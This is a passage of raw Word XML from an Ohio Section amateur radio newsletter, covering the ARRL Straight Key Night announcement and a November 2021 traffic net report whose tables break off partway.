        <w:t xml:space="preserve">All authorized Amateur frequencies can be used, but activity has traditionally been centered on the HF bands. More information can be found at </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="00B5211F">
          <w:rPr>
            <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
            <w:color w:val="000080"/>
            <w:kern w:val="1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.arrl.org/straight-key-night</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C442B72" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Have fun and I'll meet you on the OSSBN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E438929" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF1AE15" w14:textId="2E4E3664" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:noProof/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="252999680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E93BF18" wp14:editId="5F85E279">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1360805</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3189605" cy="1538605"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="23495"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="8" name="Picture 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Icon&#10;&#10;Description automatically generated"/>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189605" cy="1538605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="635" cmpd="sng">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15B01A59" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Help keep the bands busy and your radio warm, listen for and check into a traffic net or if you not going anywhere on New </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Years</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> here is something fun to try.  The ARRL Straight Key Night is coming up on January 1.  Why not dust off that old straight key and give it a try.  Who knows you may like it and have some fun.  Straight Key night starts at 0000 UTC and ends at 2359 UTC. More details can be found at </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="00B5211F">
          <w:rPr>
            <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
            <w:color w:val="000080"/>
            <w:kern w:val="1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/straight-key-night</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74629D8A" w14:textId="5ABCCB85" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00A93726">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Objective: This 24-hour event is not a contest; rather it is a day dedicated to celebrating our CW heritage. Participants are encouraged to get on the air and simply make enjoyable, conversational CW QSOs. The use of straight keys or bugs to send CW is preferred. There are no points scored and all who participate are winners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0642B218" w14:textId="17D8A162" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>73</w:t>
      </w:r>
      <w:r w:rsidR="00A93726">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4CC66D" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>David WA3EZN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517CE8EC" w14:textId="4DBBF903" w:rsidR="00B5211F" w:rsidRPr="00A93726" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Ohio Section Traffic Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22073A5B" w14:textId="11BD6265" w:rsidR="00367AFA" w:rsidRDefault="00367AFA" w:rsidP="00367AFA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD12FB9" w14:textId="1897F357" w:rsidR="00FA7155" w:rsidRDefault="00FA7155" w:rsidP="001522E1">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C96FD6" w14:textId="35D458BB" w:rsidR="00F53161" w:rsidRDefault="00F53161" w:rsidP="001522E1">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086E36DD" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OHIO SECTION TRAFFIC REPORT – NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B6EA4" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E103F74" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OHIO SECTION NETS – NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205F0F9F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-80" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1254"/>
        <w:gridCol w:w="1311"/>
        <w:gridCol w:w="1368"/>
        <w:gridCol w:w="1311"/>
        <w:gridCol w:w="2026"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="4DCC87B1" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79E70F5D"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NET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3045635D"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QNI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7101B4EF"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QTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1368" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69871FF8"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QTR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FE263B4"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SESSIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B17DED6"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N/M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="3E59398A" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A7E63DF"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BN(E)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1DCA424C"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 xml:space="preserve"> 99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="735E20BE"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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D1B0FA2"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204</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1233A860"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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="62CF1B5A" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>N2LC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="491B4284" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="000147EA"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BN(L)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C309B3F"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53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FC0A56A"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35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C96BFEE"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151</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E4DE101"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6CBDD181"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WB9LBI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="4182A57F" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35D39726"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OSN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="115A5470"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90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5166190A"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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54DB71FE"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464</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01B1038E"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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7EE20FBC"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N2LC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="57A83C2C" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C13CFD4"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OSSBN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F18D7ED"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1578</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="672065C1"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288</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1368" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60EC81F7"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1655</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C42CD4D"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90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59CAE461"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KC8WH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C194324" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2031B025" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OHIO SECTION PSHR REPORTS – NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F3CDB" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-80" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="671"/>
        <w:gridCol w:w="855"/>
        <w:gridCol w:w="855"/>
